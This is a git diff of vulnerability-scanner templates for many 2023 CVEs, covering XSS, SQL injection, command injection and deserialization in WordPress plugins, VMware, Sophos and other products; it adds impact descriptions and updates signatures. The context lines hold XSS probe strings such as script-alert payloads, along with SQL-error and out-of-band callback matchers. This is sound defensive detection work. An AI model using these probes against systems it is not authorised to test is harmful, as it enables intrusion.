+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'contains(body, "/><script>alert(document.domain)</script>")'
           - 'contains(body, "Bank Locker Management System")'
         condition: and
-# digest: 490a00463044022050bc44546a3bb18a30cd9117278fe0e784c23524d5bfb4b0cd752f8f570c92e802205f05b8a275fe2c0a7728dd070424a5258e6a4cb5f79e44fe1c0d4c7166f2041c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210090244a74d3fb1e18dd8970033677e0b35b1e880b7c9213c4a9f3d651ea658f37022100aa9843ab50102b9efb225fd7dfa9ee90728200fe7d52e3b1569e4f13c508b8d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml
index 8c95d1ed15..c2df32c495 100644
--- a/http/cves/2023/CVE-2023-0630.yaml
+++ b/http/cves/2023/CVE-2023-0630.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database, potentially exposing sensitive information.
   remediation: Fixed in version 4.9.3.3
   reference:
     - https://wpscan.com/vulnerability/b82bdd02-b699-4527-86cc-d60b56ab0c55
@@ -50,4 +52,4 @@ http:
           - 'contains(content_type_2, "application/json")'
           - 'contains(body_2, "audioShortcodeLibrary")'
         condition: and
-# digest: 490a0046304402200356904ec0f90e25503fd709b44bc7117d79b40a3a00673b2e752ee72d57612a02204a37d01ffe0aa19769cf23b5a73b77e156d8c5713ce8e62e9bedcc4fe3085fba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022045fbcc7ceeb386d4bf6df52e79a342cd048f7102371ab2064a539d7fa366bb8b0220468cd9c8d3e126e33a6d27a17797e3a8f4dd3d500ea06ec913e0bd3e8b4243f4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml
index 6f95016670..5a50e34cb1 100644
--- a/http/cves/2023/CVE-2023-0669.yaml
+++ b/http/cves/2023/CVE-2023-0669.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a00473045022100d3331aae6e3c8bc36f4fd7015b805d3d9bd3ae9f760e8e6dec8d69761657883502200c3f4b3c085df15e54617dc1e62ae91f59f99dbddf10df1a6aa46fa6a168ce14:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203506db8b78d75d8790271cc916046e983719eaa6e98a994466520f73318504050221008089a524239190a684e482564c8ed6d136ac023b39e2d9fd1c31e76711b0437b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml
index 5bed78fc53..d9bee30df3 100644
--- a/http/cves/2023/CVE-2023-0942.yaml
+++ b/http/cves/2023/CVE-2023-0942.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 2.5.5.
   reference:
     - https://wpscan.com/vulnerability/71aa9460-6dea-49cc-946c-d7d4bf723511
@@ -47,4 +49,4 @@ http:
           - 'status_code_2 == 200'
           - 'contains(body_2, "<svg/onload=alert(document.domain)>") && contains(body_2, "woocommerce-for-japan")'
         condition: and
-# digest: 4a0a0047304502200ce493cf42944d253536bd1e417b90b0dfe8f837c3fe61ecdfc8c63de614ae55022100c6dbcc18c30ba0cbc2663f7146f33fdb2748522a5705d12a3da24b03e665ac7e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220700c03140ecc3b1afb20c66d97624c8f55a17ba0ebc087b0b3ce421f11a15261022100fc81fc44507492926f81d868846d8410b7db6916dcbc7468064b7bc506945aaf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml
index 1d6df7fe1e..329fa4bd69 100644
--- a/http/cves/2023/CVE-2023-0948.yaml
+++ b/http/cves/2023/CVE-2023-0948.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 2.5.8.
   reference:
     - https://wpscan.com/vulnerability/a78d75b2-85a0-41eb-9720-c726ca2e8718
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "<script>alert(document.domain)</script>")'
           - 'contains(body_2, "peachpay")'
         condition: and
-# digest: 4a0a0047304502203012f16088c20bfd8c5ab4160a4e0fb0cd1af06ca633b23f5e9e0e24cd5aa4b102210086db7a76c96c1bb273f0d28bd9c70cc394d0d0452aa7d6d69dd31d82e3f61cff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ed6b1712a3041e9fc70501a3e430852b3e7ccd072987514e109b05dff076bfa6022019e8d844faf4d535c0ecbd2bb55a095b5c71d9775b15e4d7a8bffe840c59a2dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml
index 2df8933dbe..a00fb37d39 100644
--- a/http/cves/2023/CVE-2023-0968.yaml
+++ b/http/cves/2023/CVE-2023-0968.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin.
+  impact: |
+    Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser.
   remediation: Fixed in version 3.3.9.1.
   reference:
     - https://wpscan.com/vulnerability/29008d1a-62b3-4f40-b5a3-134455b01595
@@ -49,4 +51,4 @@ http:
           - 'contains(body_2, "/onmouseover=alert(document.domain)//")'
           - 'contains(body_2, "Watu Quizzes")'
         condition: and
-# digest: 4a0a00473045022100846070c2d9bb82d3db53f5a168f1c89c923f457b865a8a1c5b2245ab261c16bb02202b0153899be584eec4de6b5bf336e3a2f76dc9606a5cbc463e99ae678a3c823c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220098323070828d8a32370a8b97c040e923172aa1d94ff418b9477e622adbac02b0221009d4c58f2eb14a96170f9debe4d668fb551cb41f5bbb8460e4a6384ded15a3ed0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml
index 4ae9a65c64..97e1c1b391 100644
--- a/http/cves/2023/CVE-2023-1080.yaml
+++ b/http/cves/2023/CVE-2023-1080.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
   remediation: Fixed in version 1.5.6.
   reference:
     - https://wpscan.com/vulnerability/fcbcfb56-640d-4071-bc12-acac1b1e7a74
@@ -49,4 +51,4 @@ http:
           - 'contains(body_2, "/ onmouseover=alert(document.domain);//")'
           - 'contains(body_2, "GN Publisher")'
         condition: and
-# digest: 4b0a00483046022100fbbfda79a59a9268f1109ec3c7f8e29fc1d800c6345f057c2aae398d29e9114a02210082635a6e06e580f7471b516234c24f374dc62a5342667fb8e9ca5b748504264c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205351dd50189ff90951abb0bd5b6c3f6e4a61994ba07f548b03bbda8633eed47e022050c7e6f983e148feef2805cd212c7d3d13f35132f57ee1756a33456fe5e7effb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml
index 191c6c3ce1..d51c003f30 100644
--- a/http/cves/2023/CVE-2023-1177.yaml
+++ b/http/cves/2023/CVE-2023-1177.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \..\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation could allow an attacker to read sensitive files on the server.
   remediation: |
     Upgrade Mlflow to version 2.2.1 or later to mitigate the vulnerability.
   reference:
@@ -66,4 +68,4 @@ http:
           - '"version": "([0-9.]+)",'
         internal: true
         part: body
-# digest: 490a004630440220789cb17d7af596e8d72e21f6434cfb6de40a18c08340eb353c01e8be4d9e3790022012aaa3731c17952510bae764eda7cf008b09e14e2396d0f9690c39f3cf722aef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207f281f0255a7ed76fc80b0dae1b96d43a130a38f502b5097ee77c1f5f8e5ba790220540da1243d0498674ca5abeeb514e98ee76794ba4802b18da937a54bd01f3ece:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml
index fa4d37a63b..82712391fd 100644
--- a/http/cves/2023/CVE-2023-1362.yaml
+++ b/http/cves/2023/CVE-2023-1362.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.
+  impact: |
+    An attacker can trick users into performing unintended actions on the vulnerable application.
   remediation: |
     Upgrade to version 2.0.2 or later to mitigate the Clickjacking vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
           - "!regex('X-Frame-Options', header)"
           - "contains(body, 'BUM</b>Sys</a>')"
         condition: and
-# digest: 4b0a00483046022100cbb7f03b82154ea5965f2776cf252a3a33f890de68c9017c47dad51efbf86e92022100c8484a37b46e5a84c7aba1e9cf0a18772b25108055bf69591eb512944278391f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202e54360e9aea653dbd0bb1a8dd80c541586a83ae95735cb014d9b8931fd95452022100c700c127ffe5b41dc391bf98feca4beceddd94a2fc4a4889b7e35f47d5bd0bc9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-1434.yaml b/http/cves/2023/CVE-2023-1434.yaml
index 54d5e4e49d..0999450bfd 100644
--- a/http/cves/2023/CVE-2023-1434.yaml
+++ b/http/cves/2023/CVE-2023-1434.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
   reference:
@@ -43,5 +45,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a0046304402206aca9c974becbffd46255feaa2ba0db4491e5219a35c0cbc3db40fd20486142d02202661ddbc904295781fbbdea1b323355da660ee9b7a33d68fe758aced5040f602:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200472234b270f272e95eb957b7a3d9a47909fb6f02f98ae2280011aab8225fa2a022100bd36fb8dd317aadfa490834282adecb749ac5694b700964de6c7dc664d286d68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml
index f8d5d68d0b..b70fba36db 100644
--- a/http/cves/2023/CVE-2023-1454.yaml
+++ b/http/cves/2023/CVE-2023-1454.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade Jeecg-boot to a patched version or apply the necessary security patches provided by the vendor.
   reference:
@@ -64,4 +66,4 @@ http:
           - "XPATH syntax error: '([a-z- @%]+)'"
           - "XPATH syntax error: '([a-z@%0-9.]+)'"
         part: body
-# digest: 4a0a004730450220792ada0b20374217784987df108df6005d34948dce3f85e332036a2eaf0596f4022100d8a882a2d013f1ad14b3a730f9295ed28cba7bda06833e6d12657de13d488163:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ef5c8de900aef0c6d5e3ba50f55612290dad1c4812ec3e6fa357d85f48547c09022038c5635435fafe2ea3d0ab4c5e13c954a2f774a39892ae41b2c896ecc3ba12fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml
index 5bba5419c2..9d7fe8783e 100644
--- a/http/cves/2023/CVE-2023-1496.yaml
+++ b/http/cves/2023/CVE-2023-1496.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: |
     Upgrade to Imgproxy version 3.14.0 or later to mitigate this vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: dsl
         dsl:
           - content_security_policy
-# digest: 4b0a00483046022100ab33f2486e1c603dac5569b87bb89594795f7e3b14a9e62b449b0168177e9af0022100b026634ac2da64c730351563ce623ef9df46e1dbd4864b1264497c7facdb1d7c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d8b9cae79ad84a22d0bbf5361c355313a0e61293ec0ac572b772b3bc8969af54022040e127770bbe9804c4ffad4b76d9227dcc02d3cb7a8343a4f7687e24086e51ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml
index dae6f6133a..8f248a11be 100644
--- a/http/cves/2023/CVE-2023-1546.yaml
+++ b/http/cves/2023/CVE-2023-1546.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Fixed in version 2.124
   reference:
     - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0
@@ -46,4 +48,4 @@ http:
           - 'contains(body_2, "scriptalert(/XSS/)/script")'
           - 'contains(body_2, "mycryptocheckout")'
         condition: and
-# digest: 4b0a00483046022100b1f62f744aa31dc905e2f23308d097e3fc0badf7c7598615a33c9bd1cf1111be022100a5e0e794b1d92fd425abe9c9741376d7b40616781bd97538b31ff7c429e47b89:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205284e8b68cec616b69d16d1ca0435d2e551382f7c212a7775f162de2d6070f4b0221008356acb539a84af7e9911b9200f11b74bae2d9961b2b985a18d8eaa7a5848217:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml
index 763a4ac3b4..ea72fffae6 100644
--- a/http/cves/2023/CVE-2023-1671.yaml
+++ b/http/cves/2023/CVE-2023-1671.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: curl"
-# digest: 4a0a0047304502200cd767c416b549e5e82d391324d75ef7b8b97c0e4e454f55d5331121dd776a50022100807eb681ba2d2016ef60046b2b67c9a5b112a8d5f5247c68cf0b022aa2da2319:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d83135b9de17b9f6afe67521765977894fccd738b8f5ed6307b184a2e12f9736022046c250116c7605e69d13f51a4009fd21d5c43191d8843ab6ddafbf1066685d10:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml
index df87d40032..f92521c25e 100644
--- a/http/cves/2023/CVE-2023-1698.yaml
+++ b/http/cves/2023/CVE-2023-1698.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
   remediation: |
     Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022011cc1dfaa8d9d8994b829f394388d6363dbc16040750f01ffde1c0ac20915fe30220645381ee629975bfee1404149fe1c53a61020b54b067e53d7bc020bf3b94a995:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210096b7c1b1e4635caedabbc63aea1a86e0cf3a724addb0763af20f50bab274cd410220699230bb55c747766d2608962775a089d36ef4157992cfac10f93e22c7c68434:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml
index 80ae4e9cbe..fe350275d7 100644
--- a/http/cves/2023/CVE-2023-1730.yaml
+++ b/http/cves/2023/CVE-2023-1730.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: Fixed in version 3.1.5
   reference:
     - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7
@@ -41,4 +43,4 @@ http:
           - 'status_code == 200'
           - 'contains(body, "supportcandy")'
         condition: and
-# digest: 4b0a00483046022100943ee55eb5392481818b18ad558a5cc84ed0905868ffcd3963459c4fe732eaf60221009ae4641047575d21b84b8179cf5b835f7a65b3c4b47b8d89df40d6ba4c8f56ee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200b1333ad55acdf96177ea0b22bfdbc8757d6d7c1d8c774a06c54fd66eea0577d0221009d23ecff54d883ceef32bbda079b141ce97374bec375cf2b1b69f7386738801d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml
index 03e82d48cc..029a238f98 100644
--- a/http/cves/2023/CVE-2023-1835.yaml
+++ b/http/cves/2023/CVE-2023-1835.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of Ninja Forms (3.6.22 or higher) to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
           - 'contains(body_2, "<svg/onload=alert(document.domain)>")'
           - 'contains(body_2, "Ninja Forms")'
         condition: and
-# digest: 4a0a00473045022035574e0a9db4c02f6db11e258731e0cb26e6e32b0656437290dbc8fe18fdf747022100b43c5cf0679e3ff68eb23257ec0f0f62120153c7102a69938c0a04aac4d2c26d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220030017092087deb4baaa87c07d1876131a002e97970f14c551995d9b4df15231022047730ddc7553d9b8a5f8db7d657f4e3422c6846fd152ae1d25374a65c9dbf92d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml
index 5dc619cdd0..c6f9594875 100644
--- a/http/cves/2023/CVE-2023-1890.yaml
+++ b/http/cves/2023/CVE-2023-1890.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the execution of arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Fixed in version 1.0.9.
   reference:
     - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "<script>alert`document_domain`</script>")'
           - 'contains(body_2, "tablesome")'
         condition: and
-# digest: 4b0a004830460221008faf69f4549c02aa535444013fa8954214a8cfa7636ea180bb4ebcc6acc2fd32022100affc476a958165ee7ad368dc573982f5f663c1ee384540d5579177ada657de5d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022037dd34d615b41953fb5a999f88e7404a25a29e84f50457abce8c69bfc89598fb022100ed9857c6050dfa7a9439820d5bf0ff483366586af413aaeafe9ebfeeb693e8a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml
index a675aefba0..0b02d701e5 100644
--- a/http/cves/2023/CVE-2023-20073.yaml
+++ b/http/cves/2023/CVE-2023-20073.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
   remediation: |
     Apply the latest security patches provided by Cisco to mitigate this vulnerability.
   reference:
@@ -78,4 +80,4 @@ http:
         part: body_3
         words:
           - "{{html_comment}}"
-# digest: 4b0a00483046022100b57a321555f86f86e69fd394a76703df997adc4a4d55adefd4dd0677d41c270202210088497430e6cee287621745ba75dcd74c318610c349c01f0b4274370442a9d088:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dede58c70d6c7c5c53924611f433bb939d3c370d633ed6e0bdb4b768119d27f302204ed4350ef83ae210597bd091decfbc0a9739ee100d201ff72a06c4ed17aefa84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml
index d8acc8b349..33efa3e5e0 100644
--- a/http/cves/2023/CVE-2023-2023.yaml
+++ b/http/cves/2023/CVE-2023-2023.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 3.7.3
   reference:
     - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317
@@ -47,4 +49,4 @@ http:
           - contains(body_2, "onanimationstart=alert(document.domain)//")
           - contains(body_2, "Custom 404 Pro")
         condition: and
-# digest: 490a00463044022042b3788c81b56cac2c44a220b83bde6fdd2f8747351d5675ce2656e61db6239d022010d0806da316c9718103210d679cbf2129ad691f732304d785d6982c86c4f106:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207a600dfae2f0e2060d6574dad24499c9601e138f6367c2aa7f5da1d9cb727729022100fdb1fd7f2f68e4b3d60b9bea5eda02af9723abac2e803692833ec91da52846bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml
index 3a57bc9a4c..6d468e6800 100644
--- a/http/cves/2023/CVE-2023-20864.yaml
+++ b/http/cves/2023/CVE-2023-20864.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.
   reference:
@@ -60,4 +62,4 @@ http:
         internal: true
         kval:
           - "X_CSRF_Token"
-# digest: 4a0a00473045022079dfc6f59c73ef664f9a4270cf9e26b55a9d942a0032fb7306c209aebeed68db022100e62675b3796ffbb47f9042c421561f56524e81acd0fc4b47361c3e5cd660e25b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210095790f97188fbbea16617fedb9780b907d2b42ed228e92440c235c145df7c35102203633044fa3e1ee1e35186ab25e3efb95b4765a88c472495e4791f5891a91bb92:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml
index 1e525d539c..fd30a040c2 100644
--- a/http/cves/2023/CVE-2023-20887.yaml
+++ b/http/cves/2023/CVE-2023-20887.yaml
@@ -7,6 +7,8 @@ info:
   description: |
     VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are
      vulnerable.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches provided by VMware to mitigate this vulnerability.
   reference:
@@ -64,4 +66,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022065783e3a2391e34d4ffcc59bb6d0ee3498efd92ce334ee5dbcdb2efa6c7f5cc2022071114f3c1a4c30568cc6d5cfff383d4533cc7749e19d765a8dbb7f3b80a6ed3c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
